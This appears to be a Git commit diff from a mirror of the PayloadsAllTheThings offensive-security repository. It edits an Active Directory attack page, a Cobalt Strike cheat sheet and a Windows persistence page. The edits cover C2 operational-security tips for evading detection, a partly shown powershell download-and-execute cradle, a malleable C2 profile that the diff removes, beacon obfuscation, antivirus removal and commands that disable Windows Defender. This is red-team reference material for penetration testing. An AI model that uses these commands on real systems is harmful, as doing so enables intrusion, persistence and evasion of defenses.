ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-20 03:16:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

AV Removal + Cobalt SleepKit

Browse Source
This commit is contained in:
Swissky 2022-03-01 23:01:25 +01:00
parent 6a193730be
commit 521975a05c
3 changed files with 66 additions and 81 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
Methodology and Resources/Active Directory Attack.md
View File

@ -232,6 +232,7 @@ Use the correct collector
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile> .\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile>
.\SharpHound.exe -c all -d active.htb --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100 .\SharpHound.exe -c all -d active.htb --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100
.\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23 .\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
.\SharpHound.exe -c all,GPOLocalGroup --searchforest
# or run the collector on the machine using Powershell # or run the collector on the machine using Powershell
# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1

127
Methodology and Resources/Cobalt Strike - Cheatsheet.md
View File

@ -18,7 +18,8 @@ $ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstri
* [Infrastructure](#infrastructure) * [Infrastructure](#infrastructure)
* [Redirectors](#redirectors) * [Redirectors](#redirectors)
* [Domain fronting](#domain-fronting) * [Domain fronting](#domain-fronting)
* [OpSec](#opsec) * [OpSec](#opsec)
* [Customer ID](#customer-id)
* [Payloads](#payloads) * [Payloads](#payloads)
* [DNS Beacon](#dns-beacon) * [DNS Beacon](#dns-beacon)
* [SMB Beacon](#smb-beacon) * [SMB Beacon](#smb-beacon)
@ -37,6 +38,7 @@ $ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstri
* [Resource Kit](#resource-kit) * [Resource Kit](#resource-kit)
* [Artifact Kit](#artifact-kit) * [Artifact Kit](#artifact-kit)
* [Mimikatz Kit](#mimikatz-kit) * [Mimikatz Kit](#mimikatz-kit)
* [Beacon Object Files](#beacon-object-files)
* [NTLM Relaying via Cobalt Strike](#ntlm-relaying-via-cobalt-strike) * [NTLM Relaying via Cobalt Strike](#ntlm-relaying-via-cobalt-strike)
* [References](#references) * [References](#references)
@ -53,14 +55,14 @@ socat TCP4-LISTEN:80,fork TCP4:[TEAM SERVER]:80
### Domain Fronting ### Domain Fronting
* New Listener > HTTP Host Header * New Listener > HTTP Host Header
* Target Finance & Healthcare domains * Choose a domain in "Finance & Healthcare" sector
### OpSec ## OpSec
**Don't** **Don't**
* Change default self-signed HTTPS certificate * Use default self-signed HTTPS certificate
* Change default port (50050) * Use default port (50050)
* 0.0.0.0 DNS response * Use 0.0.0.0 DNS response
* Metasploit compatibility, ask for a payload : `wget -U "Internet Explorer" http://127.0.0.1/vl6D` * Metasploit compatibility, ask for a payload : `wget -U "Internet Explorer" http://127.0.0.1/vl6D`
**Do** **Do**
@ -69,9 +71,17 @@ socat TCP4-LISTEN:80,fork TCP4:[TEAM SERVER]:80
* Firewall 50050 and access via SSH tunnel * Firewall 50050 and access via SSH tunnel
* Edit default HTTP 404 page and Content type: text/plain * Edit default HTTP 404 page and Content type: text/plain
* No staging `set hosts_stage` to `false` in Malleable C2 * No staging `set hosts_stage` to `false` in Malleable C2
* Use Malleable Profile to taylor your attack to specific actors
### Customer ID
## Payload > The Customer ID is a 4-byte number associated with a Cobalt Strike license key. Cobalt Strike 3.9 and later embed this information into the payload stagers and stages generated by Cobalt Strike.
* The Customer ID value is the last 4-bytes of a Cobalt Strike payload stager in Cobalt Strike 3.9 and later.
* The trial has a Customer ID value of 0.
* Cobalt Strike does not use the Customer ID value in its network traffic or other parts of the tool
## Payloads
### DNS Beacon ### DNS Beacon
@ -167,11 +177,14 @@ $ %windir%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe \\10.10.10.10\Shared\d
## Malleable C2 ## Malleable C2
List of Malleable Profiles hosted on Github
* Cobalt Strike - Malleable C2 Profiles https://github.com/xx0hcd/Malleable-C2-Profiles * Cobalt Strike - Malleable C2 Profiles https://github.com/xx0hcd/Malleable-C2-Profiles
* Cobalt Strike Malleable C2 Design and Reference Guide https://github.com/threatexpress/malleable-c2 * Cobalt Strike Malleable C2 Design and Reference Guide https://github.com/threatexpress/malleable-c2
* Malleable-C2-Profiles https://github.com/rsmudge/Malleable-C2-Profiles * Malleable-C2-Profiles https://github.com/rsmudge/Malleable-C2-Profiles
* SourcePoint is a C2 profile generator https://github.com/Tylous/SourcePoint * SourcePoint is a C2 profile generator https://github.com/Tylous/SourcePoint
Example of syntax
```powershell ```powershell
set useragent "SOME AGENT"; # GOOD set useragent "SOME AGENT"; # GOOD
set useragent 'SOME AGENT'; # BAD set useragent 'SOME AGENT'; # BAD
@ -186,75 +199,10 @@ prepend "!@#$%^&*()";
``` ```
Check a profile with `./c2lint`. Check a profile with `./c2lint`.
* A result of 0 is returned if c2lint completes with no errors
```powershell * A result of 1 is returned if c2lint completes with only warnings
# * A result of 2 is returned if c2lint completes with only errors
# Etumbot Profile * A result of 3 is returned if c2lint completes with both errors and warning
# http://www.arbornetworks.com/asert/2014/06/illuminating-the-etumbot-apt-backdoor/
#
# Author: @harmj0y
#
set sample_name "Etumbot";
set sleeptime "5000";
set jitter "0";
set maxdns "255";
set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";
http-get {
set uri "/image/";
client {
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8";
header "Referer" "http://www.google.com";
header "Pragma" "no-cache";
header "Cache-Control" "no-cache";
metadata {
netbios;
append "-.jpg";
uri-append;
}
}
server {
header "Content-Type" "img/jpg";
header "Server" "Microsoft-IIS/6.0";
header "X-Powered-By" "ASP.NET";
output {
base64;
print;
}
}
}
http-post {
set uri "/history/";
client {
header "Content-Type" "application/octet-stream";
header "Referer" "http://www.google.com";
header "Pragma" "no-cache";
header "Cache-Control" "no-cache";
id {
netbiosu;
append ".asp";
uri-append;
}
output {
base64;
print;
}
}
server {
header "Content-Type" "img/jpg";
header "Server" "Microsoft-IIS/6.0";
header "X-Powered-By" "ASP.NET";
output {
base64;
print;
}
}
}
```
## Files ## Files
@ -474,6 +422,32 @@ Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 :
* Load the mimikatz.cna aggressor script * Load the mimikatz.cna aggressor script
* Use mimikatz functions as normal * Use mimikatz functions as normal
### Sleep Mask Kit
> The Sleep Mask Kit is the source code for the sleep mask function that is executed to obfuscate Beacon, in memory, prior to sleeping.
Use the included `build.sh` or `build.bat` script to build the Sleep Mask Kit on Kali Linux or Microsoft Windows. The script builds the sleep mask object file for the three types of Beacons (default, SMB, and TCP) on both x86 and x64 architectures in the sleepmask directory. The default type supports HTTP, HTTPS, and DNS Beacons.
## Beacon Object Files
> A BOF is just a block of position-independent code that receives pointers to some Beacon internal APIs
Example: https://github.com/Cobalt-Strike/bof_template/blob/main/beacon.h
* Compile
```ps1
# To compile this with Visual Studio:
cl.exe /c /GS- hello.c /Fohello.o
# To compile this with x86 MinGW:
i686-w64-mingw32-gcc -c hello.c -o hello.o
# To compile this with x64 MinGW:
x86_64-w64-mingw32-gcc -c hello.c -o hello.o
```
* Execute: `inline-execute /path/to/hello.o`
## NTLM Relaying via Cobalt Strike ## NTLM Relaying via Cobalt Strike
```powershell ```powershell
@ -502,3 +476,4 @@ beacon> PortBender redirect 445 8445
* [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/) * [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/)
* [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/) * [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/)
* [Cobalt Strike - User Guide](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm) * [Cobalt Strike - User Guide](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm)
* [Cobalt Strike 4.5 - User Guide PDF](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf)

17
Methodology and Resources/Windows - Persistence.md
View File

@ -4,8 +4,10 @@
* [Tools](#tools) * [Tools](#tools)
* [Hide Your Binary](#hide-your-binary) * [Hide Your Binary](#hide-your-binary)
* [Disable Windows Defender](#disable-windows-defender) * [Disable Antivirus and Security](#disable-antivirus-and-security)
* [Disable Windows Firewall](#disable-windows-firewall) * [Antivirus Removal](#antivirus-removal)
* [Disable Windows Defender](#disable-windows-defender)
* [Disable Windows Firewall](#disable-windows-firewall)
* [Simple User](#simple-user) * [Simple User](#simple-user)
* [Registry HKCU](#registry-hkcu) * [Registry HKCU](#registry-hkcu)
* [Startup](#startup) * [Startup](#startup)
@ -47,7 +49,14 @@
PS> attrib +h mimikatz.exe PS> attrib +h mimikatz.exe
``` ```
## Disable Windows Defender ## Disable Antivirus and Security
### Antivirus Removal
* [Sophos Removal Tool.ps1](https://github.com/ayeskatalas/Sophos-Removal-Tool/)
* [Symantec CleanWipe](https://knowledge.broadcom.com/external/article/178870/download-the-cleanwipe-removal-tool-to-u.html)
### Disable Windows Defender
```powershell ```powershell
# Disable Defender # Disable Defender
@ -68,7 +77,7 @@ Add-MpPreference -ExclusionPath C:\Video, C:\install
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
``` ```
## Disable Windows Firewall ### Disable Windows Firewall
```powershell ```powershell
Netsh Advfirewall show allprofiles Netsh Advfirewall show allprofiles